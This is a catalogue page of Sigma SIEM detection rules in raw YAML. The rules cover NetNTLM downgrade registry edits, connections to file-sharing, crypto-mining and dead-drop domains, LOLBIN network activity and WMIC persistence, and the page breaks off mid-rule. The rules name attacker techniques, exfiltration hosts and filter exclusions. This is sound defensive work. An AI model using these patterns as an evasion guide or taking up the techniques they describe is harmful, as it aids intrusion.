Tool
SIEM
Sigma (generic) detection rules
1,715 rules indexed · SIEM-agnostic detection content
Sigma is the open generic signature format for SIEM systems. Expand any rule to see its raw YAML and convert it inline to native query syntax. Pick a platform above to browse every rule already rendered in that language.
Using these Sigma rules
Deploy. Pick your SIEM above and paste the rendered query straight into a saved search or detection rule, or expand any rule to convert its generic YAML inline to the language you run.
Adapt. Map the field names to your log schema - Sigma assumes a normalised taxonomy - and tune thresholds and timeframes to your own baseline before you trust the alert.
Validate. Every rule is mapped to ATT&CK, so run the matching Atomic Red Team test on /atomic to confirm the rule actually fires before you rely on it.
◈
Detection rules
50 shown of 1,715
high
NetNTLM Downgrade Attack
Detects NetNTLM downgrade attack
view Sigma YAML
title: NetNTLM Downgrade Attack
id: d3abac66-f11c-4ed0-8acb-50cc29c97eed
related:
- id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2
type: derived
status: test
description: Detects NetNTLM downgrade attack
references:
- https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
author: Florian Roth (Nextron Systems), wagga
date: 2018-03-20
modified: 2022-10-09
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1685
- attack.t1112
logsource:
product: windows
service: security
definition: 'Requirements: Audit Policy : Object Access > Audit Registry (Success)'
detection:
selection:
EventID: 4657
ObjectName|contains|all:
- '\REGISTRY\MACHINE\SYSTEM'
- 'ControlSet'
- '\Control\Lsa'
ObjectValueName:
- 'LmCompatibilityLevel'
- 'NtlmMinClientSec'
- 'RestrictSendingNTLMTraffic'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
NetNTLM Downgrade Attack - Registry
Detects NetNTLM downgrade attack
view Sigma YAML
title: NetNTLM Downgrade Attack - Registry
id: d67572a0-e2ec-45d6-b8db-c100d14b8ef2
status: test
description: Detects NetNTLM downgrade attack
references:
- https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks
- https://www.ultimatewindowssecurity.com/wiki/page.aspx?spid=NSrpcservers
author: Florian Roth (Nextron Systems), wagga, Nasreddine Bencherchali (Splunk STRT)
date: 2018-03-20
modified: 2024-12-03
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1685
- attack.t1112
logsource:
product: windows
category: registry_event
detection:
selection_regkey:
TargetObject|contains|all:
- 'SYSTEM\'
- 'ControlSet'
- '\Control\Lsa'
selection_value_lmcompatibilitylevel:
TargetObject|endswith: '\lmcompatibilitylevel'
Details:
- 'DWORD (0x00000000)'
- 'DWORD (0x00000001)'
- 'DWORD (0x00000002)'
selection_value_ntlmminclientsec:
TargetObject|endswith: '\NtlmMinClientSec'
Details:
- 'DWORD (0x00000000)' # No Security
- 'DWORD (0x00000010)' # Only Integrity
- 'DWORD (0x00000020)' # Only confidentiality
- 'DWORD (0x00000030)' # Both Integrity and confidentiality
selection_value_restrictsendingntlmtraffic:
# Note: The obvious values with issues are 0x00000000 (allow all) and 0x00000001 (audit).
# 0x00000002 can be secure but only if "ClientAllowedNTLMServers" is properly configured
# Hence all values should be monitored and investigated
TargetObject|endswith: '\RestrictSendingNTLMTraffic'
condition: selection_regkey and 1 of selection_value_*
falsepositives:
- Services or tools that set the values to more restrictive values
level: high
Convert to SIEM query
high
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
view Sigma YAML
title: Network Communication Initiated To File Sharing Domains From Process Located In Suspicious Folder
id: e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
related:
- id: 635dbb88-67b3-4b41-9ea5-a3af2dd88153
type: obsolete
status: test
description: Detects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
references:
- https://twitter.com/M_haggis/status/900741347035889665
- https://twitter.com/M_haggis/status/1032799638213066752
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
- https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2018-08-30
modified: 2025-12-10
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: network_connection
product: windows
detection:
selection_paths:
Image|contains:
- ':\$Recycle.bin'
- ':\Perflogs\'
- ':\Temp\'
- ':\Users\Default\'
- ':\Users\Public\'
- ':\Windows\Fonts\'
- ':\Windows\IME\'
- ':\Windows\System32\Tasks\'
- ':\Windows\Tasks\'
- ':\Windows\Temp\'
- '\AppData\Temp\'
- '\config\systemprofile\'
- '\Windows\addins\'
selection_domains:
Initiated: 'true'
DestinationHostname|endswith:
- '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea)
- 'anonfiles.com'
- 'cdn.discordapp.com'
- 'ddns.net'
- 'dl.dropboxusercontent.com'
- 'ghostbin.co'
- 'github.com'
- 'glitch.me'
- 'gofile.io'
- 'hastebin.com'
- 'mediafire.com'
- 'mega.co.nz'
- 'mega.nz'
- 'onrender.com'
- 'pages.dev'
- 'paste.ee'
- 'pastebin.com'
- 'pastebin.pl'
- 'pastetext.net'
- 'pixeldrain.com'
- 'privatlab.com'
- 'privatlab.net'
- 'send.exploit.in'
- 'sendspace.com'
- 'storage.googleapis.com'
- 'storjshare.io'
- 'supabase.co'
- 'temp.sh'
- 'transfer.sh'
- 'trycloudflare.com'
- 'ufile.io'
- 'w3spaces.com'
- 'workers.dev'
condition: all of selection_*
falsepositives:
- Some installers located in the temp directory might communicate with the Github domains in order to download additional software. Baseline these cases or move the github domain to a lower level hunting rule.
level: high
Convert to SIEM query
high
Network Communication With Crypto Mining Pool
Detects initiated network connections to crypto mining pools
view Sigma YAML
title: Network Communication With Crypto Mining Pool
id: fa5b1358-b040-4403-9868-15f7d9ab6329
status: stable
description: Detects initiated network connections to crypto mining pools
references:
- https://www.poolwatch.io/coin/monero
- https://github.com/stamparm/maltrail/blob/3ea70459b9559134449423c0a7d8b965ac5c40ea/trails/static/suspicious/crypto_mining.txt
- https://www.virustotal.com/gui/search/behaviour_network%253A*.miningocean.org/files
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2021-10-26
modified: 2024-01-19
tags:
- attack.impact
- attack.t1496
logsource:
category: network_connection
product: windows
detection:
selection:
DestinationHostname:
- 'alimabi.cn'
- 'ap.luckpool.net'
- 'bcn.pool.minergate.com'
- 'bcn.vip.pool.minergate.com'
- 'bohemianpool.com'
- 'ca-aipg.miningocean.org'
- 'ca-dynex.miningocean.org'
- 'ca-neurai.miningocean.org'
- 'ca-qrl.miningocean.org'
- 'ca-upx.miningocean.org'
- 'ca-zephyr.miningocean.org'
- 'ca.minexmr.com'
- 'ca.monero.herominers.com'
- 'cbd.monerpool.org'
- 'cbdv2.monerpool.org'
- 'cryptmonero.com'
- 'crypto-pool.fr'
- 'crypto-pool.info'
- 'cryptonight-hub.miningpoolhub.com'
- 'd1pool.ddns.net'
- 'd5pool.us'
- 'daili01.monerpool.org'
- 'de-aipg.miningocean.org'
- 'de-dynex.miningocean.org'
- 'de-zephyr.miningocean.org'
- 'de.minexmr.com'
- 'dl.nbminer.com'
- 'donate.graef.in'
- 'donate.ssl.xmrig.com'
- 'donate.v2.xmrig.com'
- 'donate.xmrig.com'
- 'donate2.graef.in'
- 'drill.moneroworld.com'
- 'dwarfpool.com'
- 'emercoin.com'
- 'emercoin.net'
- 'emergate.net'
- 'ethereumpool.co'
- 'eu.luckpool.net'
- 'eu.minerpool.pw'
- 'fcn-xmr.pool.minergate.com'
- 'fee.xmrig.com'
- 'fr-aipg.miningocean.org'
- 'fr-dynex.miningocean.org'
- 'fr-neurai.miningocean.org'
- 'fr-qrl.miningocean.org'
- 'fr-upx.miningocean.org'
- 'fr-zephyr.miningocean.org'
- 'fr.minexmr.com'
- 'hellominer.com'
- 'herominers.com'
- 'hk-aipg.miningocean.org'
- 'hk-dynex.miningocean.org'
- 'hk-neurai.miningocean.org'
- 'hk-qrl.miningocean.org'
- 'hk-upx.miningocean.org'
- 'hk-zephyr.miningocean.org'
- 'huadong1-aeon.ppxxmr.com'
- 'iwanttoearn.money'
- 'jw-js1.ppxxmr.com'
- 'koto-pool.work'
- 'lhr.nbminer.com'
- 'lhr3.nbminer.com'
- 'linux.monerpool.org'
- 'lokiturtle.herominers.com'
- 'luckpool.net'
- 'masari.miner.rocks'
- 'mine.c3pool.com'
- 'mine.moneropool.com'
- 'mine.ppxxmr.com'
- 'mine.zpool.ca'
- 'mine1.ppxxmr.com'
- 'minemonero.gq'
- 'miner.ppxxmr.com'
- 'miner.rocks'
- 'minercircle.com'
- 'minergate.com'
- 'minerpool.pw'
- 'minerrocks.com'
- 'miners.pro'
- 'minerxmr.ru'
- 'minexmr.cn'
- 'minexmr.com'
- 'mining-help.ru'
- 'miningpoolhub.com'
- 'mixpools.org'
- 'moner.monerpool.org'
- 'moner1min.monerpool.org'
- 'monero-master.crypto-pool.fr'
- 'monero.crypto-pool.fr'
- 'monero.hashvault.pro'
- 'monero.herominers.com'
- 'monero.lindon-pool.win'
- 'monero.miners.pro'
- 'monero.riefly.id'
- 'monero.us.to'
- 'monerocean.stream'
- 'monerogb.com'
- 'monerohash.com'
- 'moneroocean.stream'
- 'moneropool.com'
- 'moneropool.nl'
- 'monerorx.com'
- 'monerpool.org'
- 'moriaxmr.com'
- 'mro.pool.minergate.com'
- 'multipool.us'
- 'myxmr.pw'
- 'na.luckpool.net'
- 'nanopool.org'
- 'nbminer.com'
- 'node3.luckpool.net'
- 'noobxmr.com'
- 'pangolinminer.comgandalph3000.com'
- 'pool.4i7i.com'
- 'pool.armornetwork.org'
- 'pool.cortins.tk'
- 'pool.gntl.co.uk'
- 'pool.hashvault.pro'
- 'pool.minergate.com'
- 'pool.minexmr.com'
- 'pool.monero.hashvault.pro'
- 'pool.ppxxmr.com'
- 'pool.somec.cc'
- 'pool.support'
- 'pool.supportxmr.com'
- 'pool.usa-138.com'
- 'pool.xmr.pt'
- 'pool.xmrfast.com'
- 'pool2.armornetwork.org'
- 'poolchange.ppxxmr.com'
- 'pooldd.com'
- 'poolmining.org'
- 'poolto.be'
- 'ppxvip1.ppxxmr.com'
- 'ppxxmr.com'
- 'prohash.net'
- 'r.twotouchauthentication.online'
- 'randomx.xmrig.com'
- 'ratchetmining.com'
- 'seed.emercoin.com'
- 'seed.emercoin.net'
- 'seed.emergate.net'
- 'seed1.joulecoin.org'
- 'seed2.joulecoin.org'
- 'seed3.joulecoin.org'
- 'seed4.joulecoin.org'
- 'seed5.joulecoin.org'
- 'seed6.joulecoin.org'
- 'seed7.joulecoin.org'
- 'seed8.joulecoin.org'
- 'sg-aipg.miningocean.org'
- 'sg-dynex.miningocean.org'
- 'sg-neurai.miningocean.org'
- 'sg-qrl.miningocean.org'
- 'sg-upx.miningocean.org'
- 'sg-zephyr.miningocean.org'
- 'sg.minexmr.com'
- 'sheepman.mine.bz'
- 'siamining.com'
- 'sumokoin.minerrocks.com'
- 'supportxmr.com'
- 'suprnova.cc'
- 'teracycle.net'
- 'trtl.cnpool.cc'
- 'trtl.pool.mine2gether.com'
- 'turtle.miner.rocks'
- 'us-aipg.miningocean.org'
- 'us-dynex.miningocean.org'
- 'us-neurai.miningocean.org'
- 'us-west.minexmr.com'
- 'us-zephyr.miningocean.org'
- 'usxmrpool.com'
- 'viaxmr.com'
- 'webservicepag.webhop.net'
- 'xiazai.monerpool.org'
- 'xiazai1.monerpool.org'
- 'xmc.pool.minergate.com'
- 'xmo.pool.minergate.com'
- 'xmr-asia1.nanopool.org'
- 'xmr-au1.nanopool.org'
- 'xmr-eu1.nanopool.org'
- 'xmr-eu2.nanopool.org'
- 'xmr-jp1.nanopool.org'
- 'xmr-us-east1.nanopool.org'
- 'xmr-us-west1.nanopool.org'
- 'xmr-us.suprnova.cc'
- 'xmr-usa.dwarfpool.com'
- 'xmr.2miners.com'
- 'xmr.5b6b7b.ru'
- 'xmr.alimabi.cn'
- 'xmr.bohemianpool.com'
- 'xmr.crypto-pool.fr'
- 'xmr.crypto-pool.info'
- 'xmr.f2pool.com'
- 'xmr.hashcity.org'
- 'xmr.hex7e4.ru'
- 'xmr.ip28.net'
- 'xmr.monerpool.org'
- 'xmr.mypool.online'
- 'xmr.nanopool.org'
- 'xmr.pool.gntl.co.uk'
- 'xmr.pool.minergate.com'
- 'xmr.poolto.be'
- 'xmr.ppxxmr.com'
- 'xmr.prohash.net'
- 'xmr.simka.pw'
- 'xmr.somec.cc'
- 'xmr.suprnova.cc'
- 'xmr.usa-138.com'
- 'xmr.vip.pool.minergate.com'
- 'xmr1min.monerpool.org'
- 'xmrf.520fjh.org'
- 'xmrf.fjhan.club'
- 'xmrfast.com'
- 'xmrigcc.graef.in'
- 'xmrminer.cc'
- 'xmrpool.de'
- 'xmrpool.eu'
- 'xmrpool.me'
- 'xmrpool.net'
- 'xmrpool.xyz'
- 'xx11m.monerpool.org'
- 'xx11mv2.monerpool.org'
- 'xxx.hex7e4.ru'
- 'zarabotaibitok.ru'
- 'zer0day.ru'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Network Connection Initiated By AddinUtil.EXE
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
view Sigma YAML
title: Network Connection Initiated By AddinUtil.EXE
id: 5205613d-2a63-4412-a895-3a2458b587b3
status: test
description: |
Detects a network connection initiated by the Add-In deployment cache updating utility "AddInutil.exe".
This could indicate a potential command and control communication as this tool doesn't usually initiate network activity.
references:
- https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html
author: Michael McKinley (@McKinleyMike), Tony Latteri (@TheLatteri)
date: 2023-09-18
modified: 2024-07-16
tags:
- attack.stealth
- attack.t1218
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith: '\addinutil.exe'
condition: selection
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Network Connection Initiated By Eqnedt32.EXE
Detects network connections from the Equation Editor process "eqnedt32.exe".
view Sigma YAML
title: Network Connection Initiated By Eqnedt32.EXE
id: a66bc059-c370-472c-a0d7-f8fd1bf9d583
status: test
description: Detects network connections from the Equation Editor process "eqnedt32.exe".
references:
- https://twitter.com/forensicitguy/status/1513538712986079238
- https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/
- https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/
author: Max Altgelt (Nextron Systems)
date: 2022-04-14
modified: 2024-05-31
tags:
- attack.execution
- attack.t1203
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\eqnedt32.exe'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Network Connection Initiated By IMEWDBLD.EXE
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
view Sigma YAML
title: Network Connection Initiated By IMEWDBLD.EXE
id: 8d7e392e-9b28-49e1-831d-5949c6281228
related:
- id: 863218bd-c7d0-4c52-80cd-0a96c09f54af
type: derived
status: test
description: |
Detects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download
- https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
author: frack113
date: 2022-01-22
modified: 2023-11-09
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith: '\IMEWDBLD.exe'
condition: selection
falsepositives:
- Unknown
# Note: Please reduce this to medium if you find legitimate connections
level: high
Convert to SIEM query
high
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
view Sigma YAML
title: Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location
id: 7b434893-c57d-4f41-908d-6a17bf1ae98f
status: test
description: |
Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
references:
- https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2017-03-19
modified: 2025-12-10
tags:
- attack.command-and-control
- attack.t1105
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|contains:
- ':\$Recycle.bin'
- ':\Perflogs\'
- ':\Temp\'
- ':\Users\Default\'
- ':\Users\Public\'
- ':\Windows\Fonts\'
- ':\Windows\IME\'
- ':\Windows\System32\Tasks\'
- ':\Windows\Tasks\'
- '\config\systemprofile\'
- '\Contacts\'
- '\Favorites\'
- '\Favourites\'
- '\Music\'
- '\Pictures\'
- '\Videos\'
- '\Windows\addins\'
filter_main_domains:
# Note: We exclude these domains to avoid duplicate filtering from e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97
DestinationHostname|endswith:
- '.githubusercontent.com' # Includes both gists and github repositories / Michael Haag (idea)
- 'anonfiles.com'
- 'cdn.discordapp.com'
- 'ddns.net'
- 'dl.dropboxusercontent.com'
- 'ghostbin.co'
- 'github.com'
- 'glitch.me'
- 'gofile.io'
- 'hastebin.com'
- 'mediafire.com'
- 'mega.co.nz'
- 'mega.nz'
- 'onrender.com'
- 'pages.dev'
- 'paste.ee'
- 'pastebin.com'
- 'pastebin.pl'
- 'pastetext.net'
- 'portmap.io' # https://pro.twitter.com/JaromirHorejsi/status/1795001037746761892/photo/2
- 'privatlab.com'
- 'privatlab.net'
- 'send.exploit.in'
- 'sendspace.com'
- 'storage.googleapis.com'
- 'storjshare.io'
- 'supabase.co'
- 'temp.sh'
- 'transfer.sh'
- 'trycloudflare.com'
- 'ufile.io'
- 'w3spaces.com'
- 'workers.dev'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unknown
level: high
Convert to SIEM query
high
Network Connection Initiated Via Notepad.EXE
Detects a network connection that is initiated by the "notepad.exe" process.
This might be a sign of process injection from a beacon process or something similar.
Notepad rarely initiates a network communication except when printing documents for example.
view Sigma YAML
title: Network Connection Initiated Via Notepad.EXE
id: e81528db-fc02-45e8-8e98-4e84aba1f10b
status: test
description: |
Detects a network connection that is initiated by the "notepad.exe" process.
This might be a sign of process injection from a beacon process or something similar.
Notepad rarely initiates a network communication except when printing documents for example.
references:
- https://web.archive.org/web/20200219102749/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1492186586.pdf
- https://www.cobaltstrike.com/blog/why-is-notepad-exe-connecting-to-the-internet
author: EagleEye Team
date: 2020-05-14
modified: 2024-02-02
tags:
- attack.privilege-escalation
- attack.command-and-control
- attack.execution
- attack.stealth
- attack.t1055
logsource:
category: network_connection
product: windows
detection:
selection:
Image|endswith: '\notepad.exe'
filter_optional_printing:
DestinationPort: 9100
condition: selection and not 1 of filter_optional_*
falsepositives:
- Printing documents via notepad might cause communication with the printer via port 9100 or similar.
level: high
Convert to SIEM query
high
Network Connection Initiated via Finger.EXE
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
view Sigma YAML
title: Network Connection Initiated via Finger.EXE
id: 2fdaf50b-9fd5-449f-ba69-f17248119af6
related:
- id: c082c2b0-525b-4dbc-9a26-a57dc4692074
type: similar
- id: af491bca-e752-4b44-9c86-df5680533dbc
type: similar
status: experimental
description: |
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.
Investigating such network connections can also help identify potential malicious infrastructure used by threat actors
references:
- https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-11-19
tags:
- attack.command-and-control
- attack.t1071.004
- attack.execution
- attack.t1059.003
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
Image|endswith: '\finger.exe'
condition: selection
falsepositives:
- Unlikely
level: high
Convert to SIEM query
high
Network Reconnaissance Activity
Detects a set of suspicious network related commands often used in recon stages
view Sigma YAML
title: Network Reconnaissance Activity
id: e6313acd-208c-44fc-a0ff-db85d572e90e
status: test
description: Detects a set of suspicious network related commands often used in recon stages
references:
- https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
author: Florian Roth (Nextron Systems)
date: 2022-02-07
tags:
- attack.discovery
- attack.t1087
- attack.t1082
- car.2016-03-001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'nslookup'
- '_ldap._tcp.dc._msdcs.'
condition: selection
falsepositives:
- False positives depend on scripts and administrative tools used in the monitored environment
level: high
Convert to SIEM query
high
New ActiveScriptEventConsumer Created Via Wmic.EXE
Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
view Sigma YAML
title: New ActiveScriptEventConsumer Created Via Wmic.EXE
id: ebef4391-1a81-4761-a40a-1db446c0e625
status: test
description: Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence
references:
- https://twitter.com/johnlatwc/status/1408062131321270282?s=12
- https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf
author: Florian Roth (Nextron Systems)
date: 2021-06-25
modified: 2023-02-14
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1546.003
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'ActiveScriptEventConsumer'
- ' CREATE '
condition: selection
falsepositives:
- Legitimate software creating script event consumers
level: high
Convert to SIEM query
high
New Connection Initiated To Potential Dead Drop Resolver Domain
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
view Sigma YAML
title: New Connection Initiated To Potential Dead Drop Resolver Domain
id: 297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7
related:
- id: d7b09985-95a3-44be-8450-b6eadf49833e
type: obsolete
status: test
description: |
Detects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.
In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
references:
- https://web.archive.org/web/20220830134315/https://content.fireeye.com/apt-41/rpt-apt41/
- https://securelist.com/the-tetrade-brazilian-banking-malware/97779/
- https://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html
- https://github.com/kleiton0x00/RedditC2
- https://twitter.com/kleiton0x7e/status/1600567316810551296
- https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al
author: Sorina Ionescu, X__Junior (Nextron Systems)
date: 2022-08-17
modified: 2024-10-21
tags:
- attack.command-and-control
- attack.t1102
- attack.t1102.001
logsource:
category: network_connection
product: windows
detection:
selection:
Initiated: 'true'
DestinationHostname|endswith:
- '.t.me'
- '4shared.com'
- 'abuse.ch'
- 'anonfiles.com'
- 'cdn.discordapp.com'
- 'cloudflare.com'
- 'ddns.net'
- 'discord.com'
- 'docs.google.com'
- 'drive.google.com'
- 'dropbox.com'
- 'dropmefiles.com'
- 'facebook.com'
- 'feeds.rapidfeeds.com'
- 'fotolog.com'
- 'ghostbin.co/'
- 'githubusercontent.com'
- 'gofile.io'
- 'hastebin.com'
- 'imgur.com'
- 'livejournal.com'
- 'mediafire.com'
- 'mega.co.nz'
- 'mega.nz'
- 'onedrive.com'
- 'pages.dev'
- 'paste.ee'
- 'pastebin.com'
- 'pastebin.pl'
- 'pastetext.net'
- 'pixeldrain.com'
- 'privatlab.com'
- 'privatlab.net'
- 'reddit.com'
- 'send.exploit.in'
- 'sendspace.com'
- 'steamcommunity.com'
- 'storage.googleapis.com'
- 'technet.microsoft.com'
- 'temp.sh'
- 'transfer.sh'
- 'trycloudflare.com'
- 'twitter.com'
- 'ufile.io'
- 'vimeo.com'
- 'w3spaces.com'
- 'wetransfer.com'
- 'workers.dev'
- 'youtube.com'
# Note: Add/Remove browsers/applications that you don't use or those that have custom install locations
# Note: To avoid complex conditions the filters for some apps are generic by name only. A custom tuning is recommended for best results
filter_main_chrome:
Image:
- 'C:\Program Files\Google\Chrome\Application\chrome.exe'
- 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
filter_main_chrome_appdata:
Image|startswith: 'C:\Users\'
Image|endswith: '\AppData\Local\Google\Chrome\Application\chrome.exe'
filter_main_firefox:
Image:
- 'C:\Program Files\Mozilla Firefox\firefox.exe'
- 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
filter_main_firefox_appdata:
Image|startswith: 'C:\Users\'
Image|endswith: '\AppData\Local\Mozilla Firefox\firefox.exe'
filter_main_ie:
Image:
- 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
- 'C:\Program Files\Internet Explorer\iexplore.exe'
filter_main_edge_1:
- Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
- Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
- Image:
- 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
- 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
filter_main_edge_2:
Image|startswith:
- 'C:\Program Files (x86)\Microsoft\EdgeCore\'
- 'C:\Program Files\Microsoft\EdgeCore\'
Image|endswith:
- '\msedge.exe'
- '\msedgewebview2.exe'
filter_main_safari:
Image|contains:
- 'C:\Program Files (x86)\Safari\'
- 'C:\Program Files\Safari\'
Image|endswith: '\safari.exe'
filter_main_defender:
Image|contains:
- 'C:\Program Files\Windows Defender Advanced Threat Protection\'
- 'C:\Program Files\Windows Defender\'
- 'C:\ProgramData\Microsoft\Windows Defender\Platform\'
Image|endswith:
- '\MsMpEng.exe' # Microsoft Defender executable
- '\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable
filter_main_prtg:
# Paessler's PRTG Network Monitor
Image|endswith:
- 'C:\Program Files (x86)\PRTG Network Monitor\PRTG Probe.exe'
- 'C:\Program Files\PRTG Network Monitor\PRTG Probe.exe'
filter_main_brave:
Image|startswith: 'C:\Program Files\BraveSoftware\'
Image|endswith: '\brave.exe'
filter_main_maxthon:
Image|contains: '\AppData\Local\Maxthon\'
Image|endswith: '\maxthon.exe'
filter_main_opera:
Image|contains: '\AppData\Local\Programs\Opera\'
Image|endswith: '\opera.exe'
filter_main_seamonkey:
Image|startswith:
- 'C:\Program Files\SeaMonkey\'
- 'C:\Program Files (x86)\SeaMonkey\'
Image|endswith: '\seamonkey.exe'
filter_main_vivaldi:
Image|contains: '\AppData\Local\Vivaldi\'
Image|endswith: '\vivaldi.exe'
filter_main_whale:
Image|startswith:
- 'C:\Program Files\Naver\Naver Whale\'
- 'C:\Program Files (x86)\Naver\Naver Whale\'
Image|endswith: '\whale.exe'
# Note: The TOR browser shouldn't be something you allow in your corporate network.
# filter_main_tor:
# Image|contains: '\Tor Browser\'
filter_main_whaterfox:
Image|startswith:
- 'C:\Program Files\Waterfox\'
- 'C:\Program Files (x86)\Waterfox\'
Image|endswith: '\Waterfox.exe'
filter_main_midori:
Image|contains: '\AppData\Local\Programs\midori-ng\'
Image|endswith: '\Midori Next Generation.exe'
filter_main_slimbrowser:
Image|startswith:
- 'C:\Program Files\SlimBrowser\'
- 'C:\Program Files (x86)\SlimBrowser\'
Image|endswith: '\slimbrowser.exe'
filter_main_flock:
Image|contains: '\AppData\Local\Flock\'
Image|endswith: '\Flock.exe'
filter_main_phoebe:
Image|contains: '\AppData\Local\Phoebe\'
Image|endswith: '\Phoebe.exe'
filter_main_falkon:
Image|startswith:
- 'C:\Program Files\Falkon\'
- 'C:\Program Files (x86)\Falkon\'
Image|endswith: '\falkon.exe'
filter_main_qtweb:
Image|startswith:
- 'C:\Program Files (x86)\QtWeb\'
- 'C:\Program Files\QtWeb\'
Image|endswith: '\QtWeb.exe'
filter_main_avant:
Image|startswith:
- 'C:\Program Files (x86)\Avant Browser\'
- 'C:\Program Files\Avant Browser\'
Image|endswith: '\avant.exe'
filter_main_whatsapp:
Image|startswith:
- 'C:\Program Files (x86)\WindowsApps\'
- 'C:\Program Files\WindowsApps\'
Image|endswith: '\WhatsApp.exe'
DestinationHostname|endswith: 'facebook.com'
filter_main_telegram:
Image|contains: '\AppData\Roaming\Telegram Desktop\'
Image|endswith: '\Telegram.exe'
DestinationHostname|endswith: '.t.me'
filter_main_onedrive:
Image|contains: '\AppData\Local\Microsoft\OneDrive\'
Image|endswith: '\OneDrive.exe'
DestinationHostname|endswith: 'onedrive.com'
filter_main_dropbox:
Image|startswith:
- 'C:\Program Files (x86)\Dropbox\Client\'
- 'C:\Program Files\Dropbox\Client\'
Image|endswith:
- '\Dropbox.exe'
- '\DropboxInstaller.exe'
DestinationHostname|endswith: 'dropbox.com'
filter_main_mega:
Image|endswith:
# Note: This is a basic/best effort filter in order to avoid FP with the MEGA installer and executable.
# In practice please apply exact path to avoid basic path bypass techniques.
- '\MEGAsync.exe'
- '\MEGAsyncSetup32_*RC.exe' # Beta versions
